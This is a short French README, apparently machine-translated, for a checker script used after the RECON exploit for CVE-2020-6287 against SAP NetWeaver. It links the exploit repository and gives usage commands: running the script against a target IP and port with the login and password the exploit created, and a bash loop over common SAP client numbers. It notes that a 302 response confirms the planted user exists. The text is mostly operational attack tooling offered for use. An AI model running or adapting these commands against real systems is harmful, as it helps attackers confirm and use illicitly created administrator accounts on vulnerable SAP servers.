
Vérificateur pour aider à vérifier un compte créé ou trouver son mandat
Aide du vérificateur pour vérifier le compte créé ou trouver son mandat
Le script vous permet de vérifier si le compte a été créé lors de l'utilisation de l'exploit RECON.py ou de trouver le mandat du compte créé
https://github.com/chipik/SAP_RECON
chmod +x
./checker_CVE-2020-6287.sh <start mndt> <stop mndt> <ip> <port> <login> <password>
- <start mndt> : première valeur du mandat pour itérer (000-999) utile pour moi 000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520
- <stop mndt> : dernière valeur pour itérer
- <ip> : adresse IP de l'hôte vulnérable
- <port> : point de terminaison du service vulnérable
- <login> : identifiant créé avec RECON.py
- <password> : mot de passe créé avec RECON.py
for i in {000,001,002,003,004,005,006,007,008,009,066,100,150,200,500,520}; do ./checker_CVE-2020-6287.sh ${i} ${i} <ip> <port> <login> <password>;done

La première valeur est un mandat. Le code 302 indique que l'utilisateur existe.